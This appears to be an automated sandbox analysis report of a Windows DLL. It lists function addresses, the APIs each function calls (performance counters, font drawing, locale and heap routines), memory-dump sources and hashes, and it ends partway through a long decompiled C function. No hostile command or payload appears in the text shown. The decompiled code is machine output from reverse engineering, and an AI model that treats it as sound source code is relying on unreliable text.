0x6e7e13f0
0x6e7e13f2
0x6e7e1400
0x6e7e1411
0x6e7e1413
0x6e7e1415
0x6e7e141f
0x6e7e1425
0x6e7e1430
0x6e7e1438
0x6e7e1438
0x6e7e1443
0x6e7e1446
0x6e7e1446
0x6e7e144b
0x6e7e144b
0x6e7e145b
0x6e7e1461
0x6e7e1476
0x6e7e1482
0x6e7e148e
0x6e7e149a
0x6e7e14a6
0x6e7e14b2
0x6e7e14be
0x6e7e14ca
0x6e7e14d0
0x6e7e14da
0x6e7e14e4
0x6e7e14ee
0x6e7e14fa
0x6e7e14fe
0x6e7e1512
0x6e7e1515
0x6e7e151f
0x6e7e151f
0x6e7e1530
0x6e7e153f
0x6e7e154a
0x6e7e1554
0x6e7e155e
0x6e7e13b1
0x6e7e13b7
0x6e7e13b7
0x6e7e1570
0x6e7e1584
0x6e7e159a
0x6e7e15aa
0x6e7e15af
0x6e7e15c5
0x6e7e15cb
0x6e7e15cd
0x6e7e15d3
0x6e7e15d5
0x6e7e15dc
0x6e7e15df
0x6e7e15e3
0x6e7e15e5
0x6e7e15eb
0x6e7e15f4
0x6e7e15fa
0x6e7e1600
0x6e7e1604
0x6e7e1606
0x6e7e1609
0x6e7e160b
0x6e7e160b
0x6e7e160d
0x6e7e1610
0x6e7e1615
0x6e7e1619
0x6e7e161b
0x6e7e1620
0x6e7e1620
0x6e7e1624
0x6e7e1627
0x6e7e162d
0x6e7e1631
0x6e7e1637
0x6e7e163d
0x6e7e163d
0x6e7e1643
0x6e7e164f
0x6e7e1655
0x6e7e1658
0x6e7e165a
0x6e7e1660
0x6e7e1660
0x6e7e1668
0x6e7e1678
0x6e7e166a
0x6e7e166a
0x6e7e166a
0x6e7e167c
0x00000000
0x00000000
0x6e7e1686
0x6e7e1689
0x6e7e168f
0x6e7e1691
0x6e7e1693
0x6e7e1693
0x6e7e1699
0x6e7e169c
0x6e7e169e
0x6e7e16a0
0x6e7e16a0
0x6e7e16a9
0x6e7e16ff
0x6e7e16ff
0x6e7e1701
0x6e7e1707
0x00000000
0x6e7e16ab
0x6e7e16ad
0x6e7e1712
0x6e7e171c
0x6e7e171e
0x6e7e16af
0x6e7e16b2
0x6e7e16b8
0x6e7e16be
0x6e7e16c0
0x6e7e16c6
0x6e7e16d0
0x6e7e16d6
0x6e7e16dc
0x00000000
0x00000000
0x6e7e16e1
0x00000000
0x6e7e16e3
0x6e7e16e9
0x6e7e16ec
0x6e7e16f0
0x6e7e16f7
0x6e7e16fd
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7e16fd
0x00000000
0x6e7e16e1
0x6e7e16d0
0x00000000
0x6e7e16be
0x6e7e16ad
0x00000000
0x6e7e16a9
0x6e7e1727
0x6e7e1729
0x6e7e1737
0x6e7e173c
0x6e7e173f
0x6e7e1745
0x6e7e1765
0x6e7e176a
0x6e7e176d
0x6e7e1771
0x6e7e1776
0x6e7e177e
0x6e7e1780
0x6e7e1784
0x6e7e1784
0x6e7e179a
0x6e7e179f
0x6e7e17a5
0x6e7e17aa
0x6e7e17ac
0x6e7e17b1
0x6e7e17b4
0x6e7e17b7
0x6e7e17b9
0x6e7e17b9
0x6e7e17d3
0x6e7e17d8
0x6e7e17e9
0x6e7e17fb
0x6e7e1800
0x6e7e1747
0x6e7e1758
0x6e7e175d
0x6e7e175d
0x6e7e1803
0x6e7e1807
0x6e7e180a
0x6e7e180c
0x6e7e180c
0x6e7e180e
0x6e7e1812
0x6e7e1815
0x6e7e1817
0x6e7e1817
0x6e7e1819
0x6e7e1820
0x6e7e1833
0x6e7e184b
0x6e7e1850
0x6e7e1856
0x6e7e1859
0x6e7e185c
0x6e7e1862
0x6e7e1862
0x6e7e1600
0x6e7e187b
0x6e7e189a
0x6e7e18a2
0x6e7e18a7
0x6e7e18ad
0x6e7e18b0
0x6e7e18b6
0x6e7e18bc
0x6e7e18c2
0x6e7e18c6
0x6e7e18ca
0x6e7e18ca
0x6e7e18e4
0x6e7e18ed
0x6e7e18ed
0x6e7e18f0
0x6e7e18ff
0x6e7e192a
0x6e7e1930
0x6e7e1936
0x6e7e1942
0x6e7e194a
0x6e7e1950
0x6e7e1956
0x6e7e1958
0x6e7e1960
0x6e7e1960
0x6e7e1963
0x6e7e1966
0x6e7e1966
0x6e7e1986
0x6e7e1993
0x6e7e199a
0x6e7e19a0
0x6e7e19b1
0x6e7e19b8
0x6e7e19b9
0x6e7e19c9
0x6e7e19d3
0x6e7e19d5
0x6e7e19d5
0x6e7e15d3
0x6e7e19e7
0x6e7e19e7
0x6e7e138d
0x6e7e19ef
0x6e7e19fc
0x6e7e1a09

APIs

PdhCollectQueryData.PDH(?,77DCEE0D,?,?,?,?,6E80947B,000000FF), ref: 6E7E13A7
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6E80947B,000000FF), ref: 6E7E1411
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6E7E1570
GetClientRect.USER32 ref: 6E7E187B
GetDeviceCaps.GDI32(?,0000005A), ref: 6E7E18F0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6E7E1905
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6E7E192A
SetTextColor.GDI32(?,?), ref: 6E7E1942
SelectObject.GDI32(?,00000000), ref: 6E7E194A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6E7E1986
SelectObject.GDI32(?,00000000), ref: 6E7E1993
DeleteObject.GDI32(00000000), ref: 6E7E199A

Strings

%s%s%s, xrefs: 6E7E1822
[N/A], xrefs: 6E7E1747
%s%d.%d%s, xrefs: 6E7E17C8

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: d18a2429885de6a84f4053a180e52d10cac3eba038625cf51dab80f0a453864f
Instruction ID: 364741a75ade16d48305a9b4eebed414b011ff9c540c81c5affe8258b9dfae90
Opcode Fuzzy Hash: d18a2429885de6a84f4053a180e52d10cac3eba038625cf51dab80f0a453864f
Instruction Fuzzy Hash: E1126771D006299FDB60CF58CD85ADAB7B9FF49304F4442E9E409A7661DB30AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7B5A, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B5C
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B82
HeapAlloc.KERNEL32(00000000), ref: 6E7E7B89
InitializeSListHead.KERNEL32(00000000), ref: 6E7E7B96
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7E7BAB
HeapFree.KERNEL32(00000000), ref: 6E7E7BB2

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: b9ba687e6a6b4531861cb8518a36e1341fa591cdd88fc525025080b36487c09a
Instruction ID: 97b7f60955b198219b123922ad1170154e2299894d0b731082f07391fe32d02a
Opcode Fuzzy Hash: b9ba687e6a6b4531861cb8518a36e1341fa591cdd88fc525025080b36487c09a
Instruction Fuzzy Hash: BAF04F31640A02ABDB419FB8CD08B5637A9BF9A716F10487CF94AD3680DB308404CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8055E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E8058FF,?,00000000), ref: 6E805679
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E8058FF,?,00000000), ref: 6E8056A2
GetACP.KERNEL32(?,?,6E8058FF,?,00000000), ref: 6E8056B7

Strings

OCP, xrefs: 6E805634
ACP, xrefs: 6E8055FE

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 79da5363bd4b38d455dfa31bfe53cfa50f443c12e2d89ef6d17b3ff1e2002788
Instruction ID: dc06ba262f321f35f1983591ae638d3dc6bf3d469e2ff7e1772d3e7040f1e6d6
Opcode Fuzzy Hash: 79da5363bd4b38d455dfa31bfe53cfa50f443c12e2d89ef6d17b3ff1e2002788
Instruction Fuzzy Hash: D021C132655306AAE7708FD5CE05B8773BAEB41B60B528C64E82ACB154F732D940C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8057B4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

Part of subcall function 6E7F9964: _free.LIBCMT ref: 6E7F99BF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E8058C0
IsValidCodePage.KERNEL32(00000000), ref: 6E80591B
IsValidLocale.KERNEL32(?,00000001), ref: 6E80592A
GetLocaleInfoW.KERNEL32(?,00001001,6E7FADEF,00000040,?,6E7FAF0F,00000055,00000000,?,?,00000055,00000000), ref: 6E805972
GetLocaleInfoW.KERNEL32(?,00001002,6E7FAE6F,00000040), ref: 6E805991

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: d9273af5c6eed2c40f41ab299941ba5b486c15ffe756516f5e42e221c977c5ac
Instruction ID: 2a4c6adcff5ad82dee58405a38816a665f5a28fd9461295610e1c8c3486e67dc
Opcode Fuzzy Hash: d9273af5c6eed2c40f41ab299941ba5b486c15ffe756516f5e42e221c977c5ac
Instruction Fuzzy Hash: DF515E71A0070AABEF60DFE9DC54AAB77B9AF05700F144C69E925EB190E7709904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E804E7C, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E7FADF6,?,?,?,?,6E7FA9E8,?,00000004), ref: 6E804F5E
_wcschr.LIBVCRUNTIME ref: 6E804FEE
_wcschr.LIBVCRUNTIME ref: 6E804FFC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E7FADF6,00000000,6E7FAF16), ref: 6E80509F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 5042cf80f83aaa3260930af814c654e221a68521b9435b4f0968df021df47b4b
Instruction ID: d69a84de2a3d4188a99387a0f7afe3feccf0d29b637ae4bf09ca2988f4e1903b
Opcode Fuzzy Hash: 5042cf80f83aaa3260930af814c654e221a68521b9435b4f0968df021df47b4b
Instruction Fuzzy Hash: 1361F371640706ABEB24DFF5CC55AEA73ACEF49754F100C2AE915DB1D0EB70EA4287A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E48F9, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E48FE
UnhandledExceptionFilter.KERNEL32(6E80A3CC,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4907
GetCurrentProcess.KERNEL32(C0000409,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4912
TerminateProcess.KERNEL32(00000000,?,6E7E4A18,6E80A3CC,00000017), ref: 6E7E4919

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: fb3c6392839a150a3f4115ddc7a165fc84d834439c4ed53fbdacb525cf4a89af
Instruction ID: f1efb41bdf8f174615999b1afa7af0456028935360d896291551f3efad944069
Opcode Fuzzy Hash: fb3c6392839a150a3f4115ddc7a165fc84d834439c4ed53fbdacb525cf4a89af
Instruction Fuzzy Hash: 14D0EA72044A48EFEF002BE1D80DA697A28AB0A656F048899F70E86451DA715611DBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D91D0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424
memoryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7D91D0(intOrPtr* __ebx, int __ecx, signed int __edx, short* __edi, long long __fp0) {
				int _v8;
				char _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				int _v60;
				signed int _v64;
				int _v68;
				char _v71;
				int _v72;
				int _v76;
				char _v77;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				signed int _v96;
				int _v100;
				int _v104;
				int _v108;
				int _v112;
				int _v116;
				char _v117;
				int _v120;
				int _v124;
				int _v128;
				int _v132;
				int _v136;
				int _v140;
				int _v144;
				int _v148;
				signed int _v152;
				int _v156;
				char _v172;
				void* _v173;
				int _v180;
				signed int _v184;
				int _v188;
				int _v192;
				int _v196;
				int _v200;
				int _v204;
				int _v208;
				int _v212;
				int _v216;
				int _v220;
				int _v224;
				int _v228;
				int* _v232;
				int _v264;
				char _v272;
				signed int _v276;
				int _v296;
				signed int _v432;
				int _v480;
				int _v520;
				char _v528;
				signed int _v532;
				int _v544;
				char _v576;
				int _v580;
				signed int _v588;
				short* _v592;
				intOrPtr* _v596;
				char _v608;
				signed int _v612;
				char _v632;
				int _v676;
				char _v684;
				signed int _v688;
				int _v696;
				intOrPtr* _v768;
				intOrPtr _v800;
				char _v816;
				signed int _v824;
				char _v1348;
				int _v1352;
				intOrPtr _v1468;
				char _v1484;
				signed int _v1492;
				intOrPtr _v1500;
				int _v1600;
				char _v1608;
				void* __esi;
				void* __ebp;
				signed int _t903;
				signed int _t904;
				int* _t908;
				signed int _t913;
				signed int _t914;
				intOrPtr _t921;
				signed int _t927;
				signed int _t933;
				signed int _t934;
				int _t936;
				int _t938;
				intOrPtr* _t947;
				signed int _t953;
				signed int _t954;
				int _t957;
				signed int _t960;
				signed int _t961;
				int _t964;
				signed int _t967;
				signed int _t968;
				int _t972;
				int _t975;
				short* _t980;
				intOrPtr _t983;
				signed int _t989;
				signed int _t990;
				int _t991;
				int* _t999;
				int _t1000;
				int _t1001;
				int* _t1007;
				signed int _t1013;
				int _t1031;
				int _t1032;
				int _t1033;
				int _t1034;
				int _t1035;
				int _t1037;
				void* _t1039;
				int _t1041;
				int _t1043;
				int _t1045;
				int _t1047;
				int _t1048;
				int _t1049;
				int _t1050;
				int _t1051;
				int _t1052;
				int _t1054;
				intOrPtr* _t1062;
				intOrPtr _t1068;
				int _t1077;
				int _t1081;
				int _t1082;
				int _t1083;
				int _t1086;
				int _t1087;
				int _t1088;
				int _t1090;
				void* _t1095;
				int _t1096;
				void* _t1097;
				int _t1098;
				signed int _t1099;
				int _t1103;
				int _t1104;
				int* _t1109;
				signed int _t1111;
				int _t1114;
				int _t1115;
				int _t1119;
				int _t1120;
				int* _t1125;
				signed int _t1127;
				int _t1130;
				int _t1135;
				int _t1136;
				int _t1142;
				int _t1146;
				int _t1147;
				int _t1148;
				int _t1151;
				int _t1152;
				int _t1153;
				int _t1155;
				void* _t1160;
				int _t1161;
				void* _t1162;
				int _t1163;
				void* _t1164;
				int _t1165;
				void* _t1166;
				int _t1167;
				void* _t1168;
				int _t1169;
				void* _t1170;
				int _t1171;
				signed int _t1172;
				int _t1176;
				int _t1177;
				void* _t1182;
				signed int _t1184;
				int _t1187;
				int _t1188;
				int _t1192;
				int _t1193;
				void* _t1198;
				signed int _t1200;
				int _t1203;
				int _t1204;
				int _t1208;
				int _t1209;
				void* _t1214;
				signed int _t1217;
				int _t1220;
				int _t1221;
				int _t1225;
				int _t1226;
				int* _t1231;
				int _t1232;
				signed int _t1233;
				int _t1236;
				int _t1237;
				int _t1241;
				int _t1242;
				int* _t1247;
				int _t1248;
				signed int _t1249;
				int _t1252;
				int _t1253;
				int _t1257;
				int _t1258;
				int* _t1263;
				int _t1264;
				signed int _t1265;
				int _t1268;
				int _t1269;
				int _t1273;
				int _t1274;
				intOrPtr* _t1279;
				intOrPtr* _t1283;
				int _t1288;
				int _t1292;
				int _t1293;
				int _t1294;
				int _t1297;
				int _t1298;
				int _t1301;
				short* _t1303;
				int _t1304;
				int _t1306;
				int _t1307;
				int _t1308;
				int _t1310;
				int _t1317;
				int _t1321;
				int _t1325;
				int _t1339;
				int _t1340;
				int _t1341;
				int _t1343;
				void* _t1348;
				int _t1349;
				void* _t1350;
				int _t1351;
				void* _t1352;
				int _t1353;
				void* _t1354;
				int _t1355;
				void* _t1356;
				int _t1357;
				signed int _t1358;
				int _t1362;
				int _t1363;
				void* _t1368;
				signed int _t1371;
				int _t1374;
				int _t1375;
				int _t1379;
				int _t1380;
				signed int _t1388;
				int _t1391;
				int _t1392;
				int _t1396;
				int _t1397;
				int _t1403;
				void* _t1404;
				signed int _t1405;
				int _t1409;
				int _t1410;
				int _t1414;
				int _t1415;
				int _t1421;
				void* _t1422;
				signed int _t1423;
				int _t1427;
				int _t1428;
				int _t1432;
				int _t1433;
				int* _t1438;
				int _t1439;
				signed int _t1440;
				int _t1443;
				int _t1444;
				int _t1448;
				int _t1449;
				int _t1456;
				int _t1460;
				short* _t1462;
				int _t1463;
				int _t1465;
				int _t1466;
				int _t1467;
				int _t1469;
				int _t1476;
				int _t1479;
				int* _t1496;
				int _t1498;
				int _t1501;
				int _t1502;
				int _t1505;
				short* _t1507;
				int _t1508;
				int _t1510;
				int _t1511;
				int _t1512;
				int _t1514;
				int* _t1522;
				intOrPtr* _t1525;
				void* _t1526;
				void* _t1530;
				char _t1531;
				signed int _t1532;
				void* _t1536;
				intOrPtr* _t1542;
				signed int _t1544;
				int _t1547;
				int _t1552;
				intOrPtr* _t1558;
				signed int _t1559;
				void* _t1560;
				void* _t1562;
				int _t1566;
				int _t1567;
				int _t1570;
				int _t1571;
				int _t1572;
				int _t1573;
				int _t1574;
				int _t1575;
				int _t1582;
				int _t1583;
				signed int _t1585;
				signed int* _t1586;
				signed int _t1587;
				int _t1588;
				signed int _t1589;
				signed int _t1590;
				signed int _t1591;
				int* _t1592;
				int _t1593;
				int _t1594;
				intOrPtr* _t1599;
				signed int _t1603;
				intOrPtr _t1606;
				int* _t1615;
				int _t1616;
				intOrPtr* _t1628;
				intOrPtr _t1632;
				int _t1634;
				signed int _t1642;
				signed int _t1644;
				int _t1654;
				signed int _t1662;
				signed int _t1664;
				signed int _t1666;
				signed int _t1668;
				signed int _t1670;
				signed int _t1672;
				intOrPtr* _t1689;
				intOrPtr* _t1696;
				intOrPtr* _t1704;
				void* _t1711;
				void* _t1712;
				int _t1713;
				signed int _t1727;
				signed int _t1729;
				signed int _t1731;
				signed int _t1733;
				signed int _t1735;
				int _t1742;
				void* _t1743;
				signed int _t1755;
				int _t1773;
				signed int _t1785;
				intOrPtr _t1792;
				intOrPtr* _t1794;
				void* _t1795;
				signed int _t1796;
				signed int _t1797;
				signed int _t1798;
				signed int _t1800;
				void* _t1803;
				int _t1810;
				int _t1811;
				int _t1812;
				signed int _t1815;
				signed int _t1816;
				void* _t1817;
				void* _t1818;
				int _t1819;
				short* _t1823;
				int _t1834;
				int _t1835;
				signed int* _t1837;
				int _t1839;
				int _t1840;
				int _t1842;
				intOrPtr _t1844;
				int _t1845;
				int _t1846;
				int* _t1848;
				int _t1850;
				void* _t1852;
				int _t1854;
				int _t1855;
				int _t1856;
				int _t1857;
				int _t1858;
				int _t1859;
				int _t1860;
				int _t1862;
				int _t1863;
				int _t1864;
				int _t1865;
				int _t1866;
				int _t1867;
				int _t1868;
				int _t1869;
				int _t1870;
				int _t1871;
				void* _t1872;
				int _t1873;
				void* _t1874;
				int _t1875;
				void* _t1876;
				int _t1877;
				int _t1879;
				int _t1880;
				int _t1881;
				int _t1882;
				int _t1883;
				int _t1884;
				int _t1885;
				int _t1886;
				int _t1887;
				void* _t1888;
				int _t1889;
				int* _t1892;
				intOrPtr* _t1893;
				int* _t1894;
				signed int _t1896;
				signed int _t1897;
				signed int _t1898;
				signed int _t1899;
				signed int _t1900;
				signed int _t1902;
				signed int _t1905;
				signed int _t1914;
				signed int _t1915;
				signed int _t1916;
				signed int _t1919;
				signed int _t1921;
				void* _t1922;
				signed int _t1925;
				void* _t1927;
				signed int _t1933;
				signed int _t1934;
				long long _t1975;

				_t1975 = __fp0;
				_t1823 = __edi;
				_t1791 = __edx;
				_t1582 = __ecx;
				_t1558 = __ebx;
				_t1896 = _t1914;
				_push(0xffffffff);
				_push(E6E808CD8);
				_push( *[fs:0x0]);
				_t1915 = _t1914 - 0x5c;
				_t903 =  *0x6e81e008; // 0x77dcee0d
				_t904 = _t903 ^ _t1896;
				_v20 = _t904;
				_push(__ebx);
				_push(__edi);
				_push(_t904);
				 *[fs:0x0] =  &_v16;
				_v96 = __edx;
				_v104 = __ecx;
				_v40 = 0;
				_v8 = 0;
				_t1834 =  *__ecx;
				if(_t1834 == 0) {
					L80:
					E6E7E7D20(0x80004003);
					goto L81;
				} else {
					_t1582 =  &_v40;
					_v8 = 0;
					_push(_t1582);
					_push(_t1834);
					_v40 = 0;
					if( *((intOrPtr*)( *_t1834 + 0x44))() < 0) {
						L76:
						__eflags = 0;
						goto L77;
					} else {
						_t1496 = _v40;
						if(_t1496 == 0) {
							L81:
							_t908 = E6E7E7D20(0x80004003);
							goto L82;
						} else {
							_t1582 =  *_t1496;
							_t1791 =  &_v44;
							_push(_t1791);
							_push(_t1496);
							if( *((intOrPtr*)(_t1582 + 0x2c))() < 0) {
								goto L76;
							} else {
								_t1498 = 0;
								_v36 = 0;
								_v8 = 4;
								_t1558 = __imp__#6;
								_v84 = 0;
								if(_v44 <= 0) {
									L48:
									_v28 = 0;
									_v8 = 0x10;
									_t1582 =  *_v104;
									__eflags = _t1582;
									if(_t1582 == 0) {
										goto L83;
									} else {
										_t1791 =  &_v28;
										_v8 = 0x10;
										_v28 = 0;
										 *((intOrPtr*)( *_t1582 + 0x34))(_t1582, _t1791);
										_t1501 = _v28;
										__eflags = _t1501;
										if(_t1501 == 0) {
											L68:
											goto L69;
										} else {
											_t1558 = MultiByteToWideChar;
											_t1823 = __imp__#6;
											while(1) {
												_v32 = 0;
												_v8 = 0x12;
												__eflags = _t1501;
												if(_t1501 == 0) {
													goto L80;
												}
												_t1791 =  &_v32;
												_t1505 =  *((intOrPtr*)( *_t1501 + 0x1c))(_t1501, _t1791);
												__eflags = _t1505;
												if(_t1505 < 0) {
													L75:
													 *_t1823(_v32);
													_t1501 = _v28;
													L69:
													_v8 = 0x1f;
													__eflags = _t1501;
													if(_t1501 != 0) {
														 *((intOrPtr*)( *_t1501 + 8))(_t1501);
													}
													goto L71;
												} else {
													_t1507 = MultiByteToWideChar(3, 0, "lines", 0xffffffff, 0, 0);
													_t1834 = _t1507;
													_t83 = _t1834 - 1; // -1
													_t1582 = _t83;
													__imp__#4(0, _t1582);
													_t1823 = _t1507;
													__eflags = _t1823;
													if(_t1823 == 0) {
														goto L85;
													} else {
														_t1508 = MultiByteToWideChar(3, 0, "lines", 0xffffffff, _t1823, _t1834);
														__eflags = _t1508 - _t1834;
														if(_t1508 != _t1834) {
															goto L84;
														} else {
															__eflags = _t1823;
															if(_t1823 == 0) {
																goto L85;
															} else {
																__imp__#314(_v32, _t1823, 0x400, 0);
																_t1823 = __imp__#6;
																_t1834 = _t1508;
																 *_t1823(_t1823);
																__eflags = _t1834 - 1;
																if(_t1834 == 1) {
																	_t1582 =  &_v28;
																	_t1791 = _v96 + 4;
																	L86();
																}
																_v24 = 0;
																_v8 = 0x16;
																_t1510 = _v28;
																__eflags = _t1510;
																if(_t1510 == 0) {
																	goto L80;
																} else {
																	_t1582 =  *_t1510;
																	_t1791 =  &_v24;
																	_v8 = 0x16;
																	_v24 = 0;
																	_t1511 =  *((intOrPtr*)(_t1582 + 0x40))(_t1510, _t1791);
																	__eflags = _t1511;
																	if(_t1511 < 0) {
																		_v8 = 0x18;
																		_t1512 = _v24;
																		__eflags = _t1512;
																		if(_t1512 != 0) {
																			 *((intOrPtr*)( *_t1512 + 8))(_t1512);
																		}
																		goto L75;
																	} else {
																		_t1834 = _v28;
																		_t1514 = _v24;
																		__eflags = _t1834 - _t1514;
																		if(_t1834 != _t1514) {
																			_v28 = _t1514;
																			_v8 = 0x1d;
																			__eflags = _t1514;
																			if(_t1514 != 0) {
																				_t1582 =  *_t1514;
																				 *((intOrPtr*)(_t1582 + 4))(_t1514);
																				_t1514 = _v24;
																			}
																			_v8 = 0x1c;
																			__eflags = _t1834;
																			if(_t1834 != 0) {
																				 *((intOrPtr*)( *_t1834 + 8))(_t1834);
																				_t1514 = _v24;
																			}
																		}
																		_v8 = 0x1e;
																		__eflags = _t1514;
																		if(_t1514 != 0) {
																			_t1582 =  *_t1514;
																			 *((intOrPtr*)(_t1582 + 8))(_t1514);
																		}
																		 *_t1823(_v32);
																		_t1501 = _v28;
																		__eflags = _t1501;
																		if(_t1501 != 0) {
																			continue;
																		} else {
																			goto L68;
																		}
																	}
																}
															}
														}
													}
												}
												goto L686;
											}
											goto L80;
										}
									}
								} else {
									while(1) {
										_t1834 = _v40;
										if(_t1834 == 0) {
											goto L80;
										} else {
											_t1582 =  *_t1834;
											_t19 = _t1582 + 0x28; // 0xe9ec4d8d
											_t1823 =  *_t19;
											_v8 = 5;
											if(_t1498 != 0) {
												_t1582 =  *_t1498;
												 *((intOrPtr*)(_t1582 + 8))(_t1498);
											}
										}
										_v8 = 4;
										_push( &_v36);
										_push(_v84);
										_v36 = 0;
										_push(_t1834);
										if( *_t1823() < 0) {
											L47:
											L71:
											_v8 = 0x20;
											_t1502 = _v36;
											__eflags = _t1502;
											if(_t1502 != 0) {
												 *((intOrPtr*)( *_t1502 + 8))(_t1502);
											}
											L77:
											_v8 = 0x21;
											_t1773 = _v40;
											__eflags = _t1773;
											if(_t1773 != 0) {
												 *((intOrPtr*)( *_t1773 + 8))(_t1773);
											}
											 *[fs:0x0] = _v16;
											__eflags = _v20 ^ _t1896;
